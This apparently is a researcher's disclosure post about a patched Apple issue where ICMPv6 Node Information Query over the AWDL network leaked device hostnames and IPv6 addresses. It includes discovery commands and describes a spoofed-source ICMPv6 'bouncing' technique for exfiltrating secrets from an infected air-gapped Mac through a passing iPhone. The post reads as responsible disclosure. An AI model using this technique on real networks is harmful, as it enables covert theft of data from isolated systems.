In the following post I go through how to escape from a truly air gapped network using Apple Wireless Direct Link -network and leveraging information leakage privacy issue in Apple devices. Issue was fixed by Apple on 24th of April 2021 with iOS 14.5, iPadOS 14.5, watchOS 7.4 and Big Sur 11.3.
We go through following scenario:
- Infected MacBook exists inside of air gapped High Security Network
- Anyone brings the iPhone to close physical proximity
- MacBook can leak secret data to the Internet via previously unknown iPhone from step 2
Lately me and my colleagues were discussing developing new tests for our Beacon product. Inspired by it I started to read more about the ICMPv6 from the point of view of testing network isolation. I found out that ICMPv6 has Node Information Query that enables information queries in the local network. This feature is neat but it might have privacy concerns in some cases. One of such cases is the Apple Wireless Direct Link (AWDL) network, which is a close range ad-hoc wireless network between all Apple devices. It is there if you have Bluetooth and WiFi enabled on your Apple device. AWDL is used for AirDrop, AirPlay, Handoff and other handy features. Apple has put plenty of effort into making the AWDL network as secure and private as possible but there have been some issues in the past (https://owlink.org/).
IPv6 Node Information Query
While learning more about ICMPv6 I found this. I started to play around in my lab environment and found out that some systems like Linux and Windows actually don’t support this feature, at least not yet or anymore?
However with macOS and iOS it worked well. You can try it by yourself if you own Apple devices. For example by running the command “ping6 -w ff02::1%en0” you should, if not patched for you by Apple, receive hostname information from your Apple devices on your WiFi, if your WiFi interface is en0.
Besides that you can query IPv6 addresses. That can be done with: “ping6 -a acgslA”. So you can first try to find device which is interesting for which in this case was my test phone:
And then you can query all the IPv6 addresses from that device.
Apparently my test phone has two different public IPv6 networks which makes sense since my test phone has WiFi and cellular connection.
Both of these can be done in the AWDL network. You can run “ping6 -w ff02::1%awdl0” and discover what Apple devices are near you. I think this is a bigger issue compared to a normal local network case because from the user point of view it is impossible to control the AWDL network. Even if you turn off AirDrop, your device will be part of the AWDL networks. Only way to disable it is to completely disable WiFi or Bluetooth from the settings.
I reported this issue to Apple 10th of September 2020 and it was fixed 24th of April 2021 with iOS 14.5, iPadOS 14.5, watchOS 7.4 and Big Sur 11.3.
Since we are at work constantly thinking about how to test network isolation for the most critical environments I obviously started to think if this can be leveraged to escape from isolated and even from air gapped networks.
Escaping from air gapped network
Let’s say that you have a fully air gapped high security network where you hold our most valuable secrets. Can we leak out data from an infected machine in a high security network if anybody walks physically near to that environment with an iPhone in their pocket using AWDL ad-hoc network?
The AWDL network is well isolated by default so there is no easy path out from the network. However because of the ICMPv6 Node Information Query we have more knowledge about the devices which are near to us. If you join into the AWDL network all the common data shared is anonymized and based on generated random addresses. Devices won’t route your traffic anywhere and only link-local addresses are in use. There is not much to do except the designed functionalities.
Since we now have capability to collect IP addresses of the other network interfaces in those devices we can use a bit of trickery to avoid some of the restrictions done by Apple.
In 2018 Ossi and I demonstrated how to escape from a host only network and other escapes in Disobey ( https://youtu.be/xySjpz2rCSs?t=131 ) . That trick was based on a technique called bouncing and we use that same trick in this scenario.
Bouncing works like this: Bouncer does not allow communication between Alice and Bob. Alice sends a message to Charlie which is allowed via Bouncer saying (spoofing) that the sender of the message is Bob. When Charlie receives the message he replies to Bob that he is not allowed to communicate with Charlie and includes the original message in that reply. This way Bob receives a message from Alice even though Bouncer tried to deny it.
Fundamental idea is to cause confusion to target network stack which is used for bouncing and make it do things which are not expected. Confusion can be caused with source IP spoofing combined with ICMP error message and the knowledge of the bounce target IP addresses on all the interfaces. In this scenario bouncing looks like this:
Leaker sends the secrets bundled into a package which include spoofed source (src) IPv6 address. Package will be sent to the iPhone with the Mobile cellular IPv6 address which means the package will be handled with different rules in the network stack. Because there is no one listening in Mobile interface UDP port 1337, iPhone will send ICMPv6 error message including secrets towards spoofed source address via Mobile interface (with route) and Receiver will receive the secrets.
We created a simple video to demonstrate the following scenario.
Attacker has been able to infect one of the laptops inside of an air gapped network. Infected machine includes secret data related to the environment and since the network is fully isolated, the attacker continuously listens for the possibility to use AWDL ad-hoc network for the data leakage. When the Bluetooth LE beacon is seen, the infected laptop joins the AWDL network and starts to leak secret information via the device seen with the method described earlier.
Combining a tiny bit of more information gathered with IPv6 Node Information Query and leveraging old network trickery leads to a new surprising leak vector. AWDL network research has been on my radar for quite a long time from the privacy point of view and I have tried to figure out a way to do something like this but the AWDL -environment is actually pretty strict so this was a surprisingly tricky to figure out. Many times even small bit of new information can make the difference.
- 2020–09–10: Privacy issue with IPv6 Node Information Query function reported to Apple.
- 2021–04–07: Apple asks details for giving credits for the find
- 2021–04–24: IPv6 Node Information Query functionality disabled in iOS 14.5, iPadOS 14.5, watchOS 7.4 and Big Sur 11.3